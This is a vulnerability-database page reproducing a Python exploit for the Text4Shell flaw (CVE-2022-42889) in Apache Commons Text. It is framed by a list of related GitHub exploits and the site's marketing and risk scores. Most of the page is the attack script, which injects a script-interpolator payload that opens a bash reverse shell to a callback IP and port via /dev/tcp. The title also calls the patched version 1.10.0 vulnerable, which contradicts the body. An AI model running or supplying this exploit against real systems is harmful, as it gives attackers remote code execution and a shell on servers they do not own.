Vulners
Lucene search
Apache Commons Text 1.10.0 - Remote Code Execution
| Reporter | Title | Published | Views | Family All 244 |
|---|---|---|---|---|
 | Exploit for Code Injection in Apache Commons_Text | 9 Sep 202312:11 | – | githubexploit |
| Exploit for Code Injection in Apache Commons_Text | 27 Jun 202308:29 | – | githubexploit |
| Exploit for Code Injection in Apache Commons_Text | 4 Nov 202219:26 | – | githubexploit |
| Exploit for Code Injection in Apache Commons_Text | 9 Sep 202312:11 | – | githubexploit |
| Exploit for Code Injection in Apache Commons_Text | 20 Oct 202218:07 | – | githubexploit |
| Exploit for Code Injection in Apache Commons_Text | 24 Mar 202515:58 | – | githubexploit |
| Exploit for Code Injection in Apache Commons_Text | 22 Oct 202202:06 | – | githubexploit |
| Exploit for Code Injection in Apache Commons_Text | 19 Oct 202222:56 | – | githubexploit |
| Exploit for Code Injection in Apache Commons_Text | 18 Oct 202213:53 | – | githubexploit |
| Exploit for Code Injection in Apache Commons_Text | 5 Nov 202207:32 | – | githubexploit |
10
# Exploit Title: Apache Commons Text 1.10.0 - Remote Code Execution
(Text4Shell - POST-based)
# Date: 2025-04-17
# Exploit Author: Arjun Chaudhary
# Vendor Homepage: https://commons.apache.org/proper/commons-text/
# Software Link:https://repo1.maven.org/maven2/org/apache/commons/commons-text/
# Version: Apache Commons Text < 1.10.0
# Tested on: Ubuntu 20.04 (Docker container), Java 11+, Apache Commons Text 1.9
# CVE: CVE-2022-42889
# Type: Remote Code Execution (RCE)
# Method: POST request, script interpolator
# Notes: This exploit demonstrates an RCE vector via POST data, differing
from common GET-based payloads.
#!/usr/bin/env python3
import urllib.parse
import http.client
import sys
def usage():
print("Usage: python3 text4shell.py <target_ip> <callback_ip> <callback_port>")
print("Example: python3 text4shell.py 127.0.0.1 192.168.22.128 4444")
sys.exit(1)
if len(sys.argv) != 4:
usage()
target_ip = sys.argv[1]
callback_ip = sys.argv[2]
callback_port = sys.argv[3]
raw_payload = (
f"${{script:javascript:var p=java.lang.Runtime.getRuntime().exec("
f"['bash','-c','bash -c \\'exec bash -i >& /dev/tcp/{callback_ip}/{callback_port} 0>&1\\''])}}"
)
encoded_payload = urllib.parse.quote(raw_payload)
path = f"/?data={encoded_payload}" # modify the parameter according to your target
print(f"[!] Remember to modify the parameter according to your target")
print(f"[+] Target: http://{target_ip}{path}")
print(f"[+] Payload (decoded): {raw_payload}")
conn = http.client.HTTPConnection(target_ip, 80)
conn.request("POST", path, body="", headers={
"Host": target_ip,
"Content-Type": "application/json",
"Content-Length": "0"
})
response = conn.getresponse()
print(f"[+] Response Status: {response.status}")
print(response.read().decode())
conn.close()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Apr 2025 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8
EPSS0.94251
SSVC